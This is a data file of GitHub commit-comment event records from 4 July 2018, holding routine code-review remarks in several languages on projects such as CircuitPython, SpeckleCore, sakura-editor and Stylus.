{"id":"7918729969","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29596046,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T14:13:51Z","updated_at":"2018-07-04T14:13:51Z","author_association":"MEMBER","body":"Op, so the feather nrf52840 will come with an external flash ? I thought we will only use 256/512KB internal flash. @ladyada  could you tell me the flash part number, I will try to see if I could find it locally, and hook it up to pca10056 to test with. "}},"created_at":"2018-07-04T14:13:51Z"}
{"id":"7918730369","type":"CommitCommentEvent","actor":{"login":"alvpickmans"},"repo":{"name":"speckleworks/SpeckleCore"},"payload":{"comment":{"id":29596048,"position":6,"line":453,"path":"SpeckleCore/ModelObjects.cs","commit_id":"72245226c239976b52af81f000e46799dd4657d6","created_at":"2018-07-04T14:13:55Z","updated_at":"2018-07-04T14:13:55Z","author_association":"MEMBER","body":"Will it worth to keep these but doing something like this \r\n`public SpecklePoint Centre { get {return this.Plane.Origin; } }`  ?"}},"created_at":"2018-07-04T14:13:55Z"}
{"id":"7918731231","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596052,"position":15,"line":14,"path":"src/main/java/ru/sergey_gusarov/hw2/util/ResultCheckHelper.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:14:06Z","updated_at":"2018-07-04T14:14:06Z","author_association":"NONE","body":"Параметр констркутора."}},"created_at":"2018-07-04T14:14:06Z"}
{"id":"7918734824","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29596061,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-04T14:14:47Z","updated_at":"2018-07-04T14:14:47Z","author_association":"MEMBER","body":"Nope @Nicogene ❗️ \r\nthe reason is that we're discussing exit codes of YARP command line tools here, not about function return codes 😉 \r\nIt's correct that `cmdExists` returns an integer."}},"created_at":"2018-07-04T14:14:47Z"}
{"id":"7918734890","type":"CommitCommentEvent","actor":{"login":"giacalenzo"},"repo":{"name":"giacalenzo/mercuryB"},"payload":{"comment":{"id":29596063,"position":null,"line":null,"path":null,"commit_id":"92d16a68ea37c8e97a4a8a7e1cfbe4e882ea96c0","created_at":"2018-07-04T14:14:48Z","updated_at":"2018-07-04T14:14:48Z","author_association":"OWNER","body":"Aggiunto ERM"}},"created_at":"2018-07-04T14:14:48Z"}
{"id":"7918734914","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596064,"position":6,"line":58,"path":"src/test/java/ru/sergey_gusarov/hw2/service/testing/TestingServiceImplFileTest.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:14:48Z","updated_at":"2018-07-04T14:14:48Z","author_association":"NONE","body":"ВОт этого не пришлось бы делать, если бы использовали мокитовски @MockBean и передавали зависимостть через Spring context."}},"created_at":"2018-07-04T14:14:48Z"}
{"id":"7918736302","type":"CommitCommentEvent","actor":{"login":"jjainschigg"},"repo":{"name":"michaelcmartin/bumbershoot"},"payload":{"comment":{"id":29596068,"position":null,"line":null,"path":null,"commit_id":"f5b46003feeb670a0e6a07022a6718db95cbf6aa","created_at":"2018-07-04T14:15:03Z","updated_at":"2018-07-04T14:15:03Z","author_association":"NONE","body":"Excellent article! You would have been very much at home on the Editorial staff at Family Computing. We tried to take the computing stuff as seriously as we could, given the \"family\" context. As Technical Editor, I reported to a guy named Lance Paavola, a Theory of Computability expert out of (as I recall) Cornell, and a gifted, meticulous coder of fundamental algorithms. I have no doubt the Brasenham implementation owed something to his expertise, as did the (recursive, as I recall) flood-fills.\r\n\r\n"}},"created_at":"2018-07-04T14:15:03Z"}
{"id":"7918738161","type":"CommitCommentEvent","actor":{"login":"pmarshwx"},"repo":{"name":"jelsner/tor-clusters"},"payload":{"comment":{"id":29596079,"position":null,"line":null,"path":null,"commit_id":"11d2abcfaaa2d93cfbf6d4961a7edbddb545c844","created_at":"2018-07-04T14:15:24Z","updated_at":"2018-07-04T14:15:24Z","author_association":"NONE","body":"The 2017 data have already been posted.\n\n\n\n\nOn Wed, Jul 4, 2018 at 9:10 AM James B. Elsner <notifications@github.com>\nwrote:\n\n> Hi Zoe,\n>\n> Let's keep a single Rmd file for now.\n>\n> Can you check to see if the NARR data for 2015 and 2016 are available from\n> here? https://rda.ucar.edu/datasets/ds608.0/\n>\n> Also, can you DM @pmarshwx and ask when the 2017 tornadoes will be\n> available in the shapefile format?\n>\n> Best,\n> Dr. E.\n>\n> On Wed, Jul 4, 2018 at 4:54 PM, Zoe Schroder <notifications@github.com>\n> wrote:\n>\n> > Dr. Elsner,\n> >\n> >\n> > I am not sure why I was getting an error. I reran it today and it worked\n> > fine. It was saying empty geometries and when I opened the file it said\n> > numeric(0) in certain geometries.\n> >\n> >\n> > Also, do we want to do a base .Rmd file? We can calculate information on\n> > the outbreaks (Out.sfdf), outbreak days (OutDays.sfdf), and individual\n> > tornadoes (TornData.sfdf). Then save.image of that .Rmd. I think it may\n> be\n> > easier so we do not have to rerun everything every time we want to work\n> on\n> > it. Instead, we can simply read in the saved image of the workspace. Then\n> > we can create a new .Rmd to run calculations and create\n> > charts/graphs/tables of the data. I wanted to run this by you before\n> doing\n> > it. Let me know what you think. Thanks!\n> >\n> >\n> > Zoe Schroder\n> >\n> >\n> > Doctoral Student\n> >\n> > Florida State University\n> >\n> > Department of Geography\n> >\n> >\n> > ________________________________\n> > From: James B. Elsner <notifications@github.com>\n> > Sent: Wednesday, July 4, 2018 4:07:15 AM\n> > To: jelsner/tor-clusters\n> > Cc: Zoe Schroder; Author\n> > Subject: Re: [jelsner/tor-clusters] Was getting an error on the\n> > st_centroid function about no data in certain geometries. (11d2abc)\n> >\n> >\n> > Why was there no data in certain geometries? Did you use data before\n> 1994?\n> > I commented your lines since I was not getting this error.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub<https://github.com/\n> > jelsner/tor-clusters/commit/11d2abcfaaa2d93cfbf6d4961a7edb\n> > ddb545c844#commitcomment-29591306>, or mute the thread<\n> https://github.com/\n> > notifications/unsubscribe-auth/Al-F1F9sBbl_FtN6ZIkXGEri6nL8JakOks5uDHezga\n> > JpZM4VCIpd>.\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/jelsner/tor-clusters/commit/11d2abcfaaa2d93cfbf6d4961a7edbddb545c844#commitcomment-29595773\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AFNlXewU9Zp7fDw3NFRbkOkBBt_ExRbDks5uDMkYgaJpZM4VCIpd\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jelsner/tor-clusters/commit/11d2abcfaaa2d93cfbf6d4961a7edbddb545c844#commitcomment-29595982>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAN9JB28BBPzmA_02FdLVDeCJgsdkOEbks5uDMzagaJpZM4VCIpd>\n> .\n>\n-- \nSent from a mobile device.\n\nDr. Patrick Marsh (@pmarshwx)\nWarning Coordination Meteorologist\nNOAA/NWS/NCEP Storm Prediction Center\n"}},"created_at":"2018-07-04T14:15:24Z"}
{"id":"7918740986","type":"CommitCommentEvent","actor":{"login":"arturo182"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29596089,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T14:15:56Z","updated_at":"2018-07-04T14:15:56Z","author_association":"COLLABORATOR","body":"The PCA10056 already comes with a 64Mb QSPI flash if you wanna just test the driver :) http://infocenter.nordicsemi.com/index.jsp?topic=%2Fcom.nordic.infocenter.nrf52%2Fdita%2Fnrf52%2Fdevelopment%2Fnrf52840_pdk%2Fintro.html"}},"created_at":"2018-07-04T14:15:56Z"}
{"id":"7918744165","type":"CommitCommentEvent","actor":{"login":"shwiseman"},"repo":{"name":"the-darkvoid/XPS9360-macOS"},"payload":{"comment":{"id":29596097,"position":null,"line":null,"path":null,"commit_id":"566eaa54ef0a1dc6456173c13bbec6111531fbcf","created_at":"2018-07-04T14:16:32Z","updated_at":"2018-07-04T14:16:32Z","author_association":"NONE","body":"Since syncing with this commit and re-running the --patch-hda command, I have been without audio over the jack. Even reverting to the old commit hasn't seemed to help. Besides the creation of the two kexts, does --patch-hda do anything else beneath the hood? I couldn't find anything in the code. Thank you."}},"created_at":"2018-07-04T14:16:32Z"}
{"id":"7918744277","type":"CommitCommentEvent","actor":{"login":"rares1200"},"repo":{"name":"alexDorni/CivilRights"},"payload":{"comment":{"id":29596098,"position":248,"line":313,"path":"app/src/main/java/com/example/heroalex/copscivilslicense/CopMap.java","commit_id":"b4e0722b84ad491372c15287a03a8452cc853700","created_at":"2018-07-04T14:16:33Z","updated_at":"2018-07-04T14:16:33Z","author_association":"COLLABORATOR","body":"Aici nu ai nevoie de event bus. Ce faci in metoda cu subscribe poti face si aici. Doar ca fara sa pui this.<variabila>>. Fara this.\r\n"}},"created_at":"2018-07-04T14:16:33Z"}
{"id":"7918745401","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596101,"position":4,"line":32,"path":"src/main/java/ru/sergey_gusarov/hw2/UserTesting.java","commit_id":"574254fb57155a1c719fd25c0e1b2f56b82a1d0a","created_at":"2018-07-04T14:16:46Z","updated_at":"2018-07-04T14:16:46Z","author_association":"NONE","body":"context.refresh() после этого можно написать, но лучше просто передать в параметры констркутора аспекта"}},"created_at":"2018-07-04T14:16:46Z"}
{"id":"7918745466","type":"CommitCommentEvent","actor":{"login":"didimitrie"},"repo":{"name":"speckleworks/SpeckleCore"},"payload":{"comment":{"id":29596102,"position":6,"line":453,"path":"SpeckleCore/ModelObjects.cs","commit_id":"72245226c239976b52af81f000e46799dd4657d6","created_at":"2018-07-04T14:16:46Z","updated_at":"2018-07-04T14:16:46Z","author_association":"MEMBER","body":"makes sense actually! "}},"created_at":"2018-07-04T14:16:46Z"}
{"id":"7918746881","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596106,"position":22,"line":20,"path":"src/main/java/ru/sergey_gusarov/hw2/config/AppConfigRus.java","commit_id":"574254fb57155a1c719fd25c0e1b2f56b82a1d0a","created_at":"2018-07-04T14:17:03Z","updated_at":"2018-07-04T14:17:03Z","author_association":"NONE","body":"И всё равно не понимаю, зачем вынесли.."}},"created_at":"2018-07-04T14:17:03Z"}
{"id":"7918747123","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29596108,"position":null,"line":null,"path":null,"commit_id":"27ef10a2f121c41b861707d213adb707b835d727","created_at":"2018-07-04T14:17:06Z","updated_at":"2018-07-04T14:17:06Z","author_association":"CONTRIBUTOR","body":"disable celery@.service and celery2@.service -> maybe can convert to openrc script??"}},"created_at":"2018-07-04T14:17:06Z"}
{"id":"7918747645","type":"CommitCommentEvent","actor":{"login":"rares1200"},"repo":{"name":"alexDorni/CivilRights"},"payload":{"comment":{"id":29596109,"position":261,"line":326,"path":"app/src/main/java/com/example/heroalex/copscivilslicense/CopMap.java","commit_id":"b4e0722b84ad491372c15287a03a8452cc853700","created_at":"2018-07-04T14:17:12Z","updated_at":"2018-07-04T14:17:12Z","author_association":"COLLABORATOR","body":"aici verificare sa il afisezi daca nu e show. Verifica daca isShown()"}},"created_at":"2018-07-04T14:17:12Z"}
{"id":"7918747853","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29596110,"position":null,"line":null,"path":null,"commit_id":"7adf30b6d2ec13449c1327468e44974162258b4f","created_at":"2018-07-04T14:17:14Z","updated_at":"2018-07-04T14:17:14Z","author_association":"COLLABORATOR","body":"I wonder whether there is an option to perform fuzzing of ping(8) with very minimal diff?"}},"created_at":"2018-07-04T14:17:14Z"}
{"id":"7918751016","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29596115,"position":null,"line":null,"path":null,"commit_id":"7adf30b6d2ec13449c1327468e44974162258b4f","created_at":"2018-07-04T14:17:49Z","updated_at":"2018-07-04T14:17:49Z","author_association":"COLLABORATOR","body":"At least a subset of it, and connect ATF in a critical place as a data generator."}},"created_at":"2018-07-04T14:17:49Z"}
{"id":"7918751901","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"BioContainers/containers"},"payload":{"comment":{"id":29596120,"position":null,"line":null,"path":null,"commit_id":"137472033079af8cf292c46a62da3f9eb3a06ed1","created_at":"2018-07-04T14:17:59Z","updated_at":"2018-07-04T14:17:59Z","author_association":"CONTRIBUTOR","body":"No integron-finder/1.5.1/test-cmds.txt (test file) present, skipping tests"}},"created_at":"2018-07-04T14:17:59Z"}
{"id":"7918758687","type":"CommitCommentEvent","actor":{"login":"berryzplus"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29596148,"position":4,"line":25,"path":"sakura_core/_main/CControlProcess.cpp","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-04T14:19:18Z","updated_at":"2018-07-04T14:19:18Z","author_association":"CONTRIBUTOR","body":"windowsのパス区切りですから円マーク（バックスラッシュ）です。\r\nこのヘッダはwindows専用なので円マークがいいです。"}},"created_at":"2018-07-04T14:19:18Z"}
{"id":"7918759905","type":"CommitCommentEvent","actor":{"login":"shwiseman"},"repo":{"name":"the-darkvoid/XPS9360-macOS"},"payload":{"comment":{"id":29596153,"position":null,"line":null,"path":null,"commit_id":"0c6dfec66ac7fc8311c813e0d767ca6ed791b96c","created_at":"2018-07-04T14:19:33Z","updated_at":"2018-07-04T14:19:33Z","author_association":"NONE","body":"Using syscl's VooDooI2C kexts from his 9350 repository has fixed for me the errors with both the PS2 and I2C from this repository."}},"created_at":"2018-07-04T14:19:33Z"}
{"id":"7918765793","type":"CommitCommentEvent","actor":{"login":"ravikumarkarn080"},"repo":{"name":"ravikumarkarn080/Android-learnings"},"payload":{"comment":{"id":29596172,"position":10,"line":12,"path":"app/src/main/AndroidManifest.xml","commit_id":"1a1f5ec3599a1a2c873399066346440ee6f50556","created_at":"2018-07-04T14:20:41Z","updated_at":"2018-07-04T14:20:41Z","author_association":"OWNER","body":"Revert\r\n"}},"created_at":"2018-07-04T14:20:41Z"}
{"id":"7918767758","type":"CommitCommentEvent","actor":{"login":"DimosPagakis"},"repo":{"name":"DimosPagakis/wp_first_form"},"payload":{"comment":{"id":29596184,"position":null,"line":null,"path":null,"commit_id":"6b58e5fca87b45ae1de392dc69c89f443ab78721","created_at":"2018-07-04T14:21:02Z","updated_at":"2018-07-04T14:21:02Z","author_association":"OWNER","body":"Currently working on a different laptop.\r\nThe red text alert doesn't ever show up. Code's desired functionality still stands\r\n"}},"created_at":"2018-07-04T14:21:02Z"}
{"id":"7918774490","type":"CommitCommentEvent","actor":{"login":"cmdcolin"},"repo":{"name":"elsiklab/multibigwig"},"payload":{"comment":{"id":29596199,"position":null,"line":null,"path":null,"commit_id":"4eb13ad6c2fca61f2bb32b0e1500641631b3545a","created_at":"2018-07-04T14:22:20Z","updated_at":"2018-07-04T14:22:20Z","author_association":"COLLABORATOR","body":"I can double check but I'm fairly certain it is (this code doesn't use new functionality for example so ya)"}},"created_at":"2018-07-04T14:22:20Z"}
{"id":"7918775920","type":"CommitCommentEvent","actor":{"login":"narcolepticinsomniac"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29596204,"position":null,"line":null,"path":null,"commit_id":"39491ff0f5cbb1f4ca028830980761e32394ffb7","created_at":"2018-07-04T14:22:37Z","updated_at":"2018-07-04T14:22:37Z","author_association":"MEMBER","body":"WTF did I do?"}},"created_at":"2018-07-04T14:22:37Z"}
{"id":"7918781047","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29596216,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T14:23:37Z","updated_at":"2018-07-04T14:23:37Z","author_association":"COLLABORATOR","body":"Actually, as I was going through older issues, it turns out that #350 documents some of the missing information that can be captured by the Notes field implementation; since this is the case, the constructors will be updated to contain the missing information soon."}},"created_at":"2018-07-04T14:23:37Z"}
{"id":"7918781182","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29596217,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T14:23:38Z","updated_at":"2018-07-04T14:23:38Z","author_association":"MEMBER","body":"@arturo182  oh thanks, I didn't know that. That is very nice. I will try to get it to work with MSC. Do we still need to have msc expose internal flash as well ?  "}},"created_at":"2018-07-04T14:23:38Z"}
{"id":"7918781915","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29596220,"position":null,"line":null,"path":null,"commit_id":"39491ff0f5cbb1f4ca028830980761e32394ffb7","created_at":"2018-07-04T14:23:46Z","updated_at":"2018-07-04T14:23:46Z","author_association":"MEMBER","body":"idk but I see a typo: `applis-to`"}},"created_at":"2018-07-04T14:23:46Z"}
{"id":"7918809935","type":"CommitCommentEvent","actor":{"login":"ludovic-tc"},"repo":{"name":"ludovic-tc/perldotcom"},"payload":{"comment":{"id":29596300,"position":null,"line":null,"path":null,"commit_id":"dee6ea2e886705bab595e7fa7f5130925092c1bb","created_at":"2018-07-04T14:29:08Z","updated_at":"2018-07-04T14:29:08Z","author_association":"OWNER","body":"fixed broken link"}},"created_at":"2018-07-04T14:29:08Z"}
{"id":"7918810074","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29596301,"position":24,"line":24,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-04T14:29:09Z","updated_at":"2018-07-04T14:29:09Z","author_association":"NONE","body":"вопросы похожие:\r\n- к какому из пунктов задания относится этот метод?\r\n- как переводится название?\r\n- что он делает?"}},"created_at":"2018-07-04T14:29:09Z"}
{"id":"7918811732","type":"CommitCommentEvent","actor":{"login":"w8tcha"},"repo":{"name":"w8tcha/CKEditor-CodeMirror-Plugin"},"payload":{"comment":{"id":29596306,"position":4,"line":50,"path":"Gruntfile.js","commit_id":"213e82994296cf1d1cf2b4c5ac6f2d7cd9c1b74e","created_at":"2018-07-04T14:29:27Z","updated_at":"2018-07-04T14:29:27Z","author_association":"OWNER","body":"Yes i did"}},"created_at":"2018-07-04T14:29:27Z"}
{"id":"7918816630","type":"CommitCommentEvent","actor":{"login":"chubinou"},"repo":{"name":"Hchnr/VLC-qml2"},"payload":{"comment":{"id":29596317,"position":4,"line":1026,"path":"modules/gui/qt/components/interface_widgets.cpp","commit_id":"9a83df4724b6c3b5074f704d83f274462e8f2f1e","created_at":"2018-07-04T14:30:23Z","updated_at":"2018-07-04T14:30:23Z","author_association":"CONTRIBUTOR","body":"Can you bind the time to a Q_PROPERTY of an object exposed in QML rather than a signal?\r\n\r\nisn't the TimeLabel class bound to a QtWidget object ? it looks like you are mixing Widget and QML objects."}},"created_at":"2018-07-04T14:30:23Z"}
{"id":"7918817642","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29596321,"position":26,"line":26,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-04T14:30:35Z","updated_at":"2018-07-04T14:30:35Z","author_association":"NONE","body":"вопросы похожие:\r\n- к какому из пунктов задания относится этот метод?\r\n- как переводится название?\r\n- что он делает?"}},"created_at":"2018-07-04T14:30:35Z"}
{"id":"7918818587","type":"CommitCommentEvent","actor":{"login":"berryzplus"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29596325,"position":28,"line":28,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-04T14:30:46Z","updated_at":"2018-07-04T14:30:46Z","author_association":"CONTRIBUTOR","body":"このプリプロセッサ命令の目的は、このヘッダを使う人に依存ファイルを知らせることです。\r\n\r\nwindows.hをインクルードし忘れた人を救済することは考えていません。\r\nwindows.hは、include前に特定のシンボルを定義してやるとincludeされる内容が変わるヘッダです。\r\nデフォルト（シンボルを何も定義しない）だと重いので、勝手にincludeされると困るファイルです。\r\n\r\nなので「このヘッダの前にwindows.hをインクルードする必要がある」ということを、利用者に伝えることまでがここのプリプロセッサ命令の目的です。SDKやCRTのヘッダではよく見る手法だと思います。（microsoft方言なのかも知れません\r\n"}},"created_at":"2018-07-04T14:30:46Z"}
{"id":"7918824208","type":"CommitCommentEvent","actor":{"login":"kodeGenius"},"repo":{"name":"kodeGenius/ZtM-Job-Board"},"payload":{"comment":{"id":29596343,"position":null,"line":null,"path":null,"commit_id":"9585741f1f873bfd534ecfc42472c6ef706b0e80","created_at":"2018-07-04T14:31:51Z","updated_at":"2018-07-04T14:31:51Z","author_association":"OWNER","body":"This is great!"}},"created_at":"2018-07-04T14:31:51Z"}
{"id":"7918824628","type":"CommitCommentEvent","actor":{"login":"wnew"},"repo":{"name":"casper-astro/mlib_devel"},"payload":{"comment":{"id":29596345,"position":null,"line":null,"path":null,"commit_id":"4eab32e207a9c7b2d968547b9d5a61bcdcf27d5b","created_at":"2018-07-04T14:31:56Z","updated_at":"2018-07-04T14:31:56Z","author_association":"CONTRIBUTOR","body":"@jack-h This commit worries me. We agree with the requirement to do this, but it would be best to do the large merge at busy week before splitting up the libraries. This will just make the merge a lot harder. "}},"created_at":"2018-07-04T14:31:56Z"}
{"id":"7918825046","type":"CommitCommentEvent","actor":{"login":"sinhprous"},"repo":{"name":"butterfly1996/Sensor_network"},"payload":{"comment":{"id":29596346,"position":15,"line":22,"path":"sensors_field.py","commit_id":"d54463a23332f9e0fa75614af98bb2da066023f1","created_at":"2018-07-04T14:32:02Z","updated_at":"2018-07-04T14:32:02Z","author_association":"COLLABORATOR","body":"hai dong code ngu hon cho"}},"created_at":"2018-07-04T14:32:02Z"}
{"id":"7918825175","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29596347,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T14:32:03Z","updated_at":"2018-07-04T14:32:03Z","author_association":"MEMBER","body":"nrf52832 does not have usb at all, it has its own internal flash but accessing via command (via serial) which is not user friendly. I think the main nrf52 board featuring CP should be nrf52840, and we don't have to support all the nrf52840 like the dongle, only the upcoming feather 52840 and pca10056 would be good enough. "}},"created_at":"2018-07-04T14:32:03Z"}
{"id":"7918826865","type":"CommitCommentEvent","actor":{"login":"narcolepticinsomniac"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29596351,"position":null,"line":null,"path":null,"commit_id":"39491ff0f5cbb1f4ca028830980761e32394ffb7","created_at":"2018-07-04T14:32:22Z","updated_at":"2018-07-04T14:32:22Z","author_association":"MEMBER","body":"Oh right, this isn't my PR. And there's a typo. Can you revert this?"}},"created_at":"2018-07-04T14:32:22Z"}
{"id":"7918827531","type":"CommitCommentEvent","actor":{"login":"isheebo"},"repo":{"name":"roxyrobert/ride-ch3"},"payload":{"comment":{"id":29596353,"position":49,"line":196,"path":"api/views.py","commit_id":"21fc2889d9d843a63a18134a4346986e1b328784","created_at":"2018-07-04T14:32:31Z","updated_at":"2018-07-04T14:32:31Z","author_association":"NONE","body":"remove all instances of commented code"}},"created_at":"2018-07-04T14:32:31Z"}
{"id":"7918827901","type":"CommitCommentEvent","actor":{"login":"gaohua106"},"repo":{"name":"gaohua106/PythonStudy"},"payload":{"comment":{"id":29596355,"position":null,"line":null,"path":null,"commit_id":"319cb4865662e2949258b3396be438850d19ff53","created_at":"2018-07-04T14:32:35Z","updated_at":"2018-07-04T14:32:35Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-04T14:32:35Z"}
{"id":"7918838309","type":"CommitCommentEvent","actor":{"login":"AbinayaBagavan"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29596375,"position":null,"line":null,"path":null,"commit_id":"43add2a640214483b00d9ca491990bb86104501e","created_at":"2018-07-04T14:34:31Z","updated_at":"2018-07-04T14:34:31Z","author_association":"NONE","body":"@kboedges Everything is loaded except the images"}},"created_at":"2018-07-04T14:34:31Z"}
{"id":"7918841556","type":"CommitCommentEvent","actor":{"login":"berryzplus"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29596386,"position":56,"line":56,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-04T14:35:10Z","updated_at":"2018-07-04T14:35:10Z","author_association":"CONTRIBUTOR","body":"こだわりないので改行を入れて行頭に来るように変更しました。\r\n\r\n既存コードを見た感じ、ヘッダは行末が多くて、cppは行頭が多い気がしています。\r\n\r\nファイルの中ではできるだけ揃える、には同意です。\r\n"}},"created_at":"2018-07-04T14:35:10Z"}
{"id":"7918842163","type":"CommitCommentEvent","actor":{"login":"yongsheng2015"},"repo":{"name":"yongsheng2015/meetingroom"},"payload":{"comment":{"id":29596388,"position":null,"line":null,"path":null,"commit_id":"922c3d41c5c513caf7834870c328e8aba494c07a","created_at":"2018-07-04T14:35:16Z","updated_at":"2018-07-04T14:35:16Z","author_association":"OWNER","body":"第5次测试：回退 2018/7/4 22：34 "}},"created_at":"2018-07-04T14:35:16Z"}
{"id":"7918843555","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29596395,"position":null,"line":null,"path":null,"commit_id":"39491ff0f5cbb1f4ca028830980761e32394ffb7","created_at":"2018-07-04T14:35:31Z","updated_at":"2018-07-04T14:35:31Z","author_association":"MEMBER","body":"done."}},"created_at":"2018-07-04T14:35:31Z"}
{"id":"7918846183","type":"CommitCommentEvent","actor":{"login":"narcolepticinsomniac"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29596398,"position":null,"line":null,"path":null,"commit_id":"39491ff0f5cbb1f4ca028830980761e32394ffb7","created_at":"2018-07-04T14:36:02Z","updated_at":"2018-07-04T14:36:02Z","author_association":"MEMBER","body":"Thanks. And there was no typo. I copied from the wrong editor tab. Think I need a break."}},"created_at":"2018-07-04T14:36:02Z"}
{"id":"7918847225","type":"CommitCommentEvent","actor":{"login":"Damanjeet88"},"repo":{"name":"Damanjeet88/CI_CRUD"},"payload":{"comment":{"id":29596402,"position":null,"line":null,"path":null,"commit_id":"e67dc1a06d24275403dadfd861e1082a22f486c4","created_at":"2018-07-04T14:36:14Z","updated_at":"2018-07-04T14:36:14Z","author_association":"OWNER","body":"Testing passing of data from Controller to Model using $data"}},"created_at":"2018-07-04T14:36:14Z"}
{"id":"7918851380","type":"CommitCommentEvent","actor":{"login":"Benji49610"},"repo":{"name":"Benji49610/Exo-cours"},"payload":{"comment":{"id":29596413,"position":null,"line":null,"path":null,"commit_id":"72637e74814244443a31d5d61db92d1354e9f351","created_at":"2018-07-04T14:37:01Z","updated_at":"2018-07-04T14:37:01Z","author_association":"OWNER","body":"Thx your Bro"}},"created_at":"2018-07-04T14:37:01Z"}
{"id":"7918853741","type":"CommitCommentEvent","actor":{"login":"arturo182"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29596416,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T14:37:29Z","updated_at":"2018-07-04T14:37:29Z","author_association":"COLLABORATOR","body":":man_facepalming: you're right with the nRF52832, not sure what I was thinking. As for the nRF52840, I'm a bit unsure, I got a few PCA10059s the other day and wanted to add them as a board to CP because I think they are are good candidate to get started with CP on nRF, they are only $11 on Mouser and they can be plugged directly into the PC, which means you could just plug, start Mu and have BLE in CP running in minutes."}},"created_at":"2018-07-04T14:37:29Z"}
{"id":"7918854056","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"FriendsOfREDAXO/undo"},"payload":{"comment":{"id":29596417,"position":28,"line":28,"path":"lib/undo.php","commit_id":"31db007f6a502a66c222ab70c997398071d2fd66","created_at":"2018-07-04T14:37:32Z","updated_at":"2018-07-04T14:37:32Z","author_association":"MEMBER","body":"Hmm d.h. 2 user gleizeitig können sich das undo aktuell gegenseitig „kaputt“ machen?"}},"created_at":"2018-07-04T14:37:32Z"}
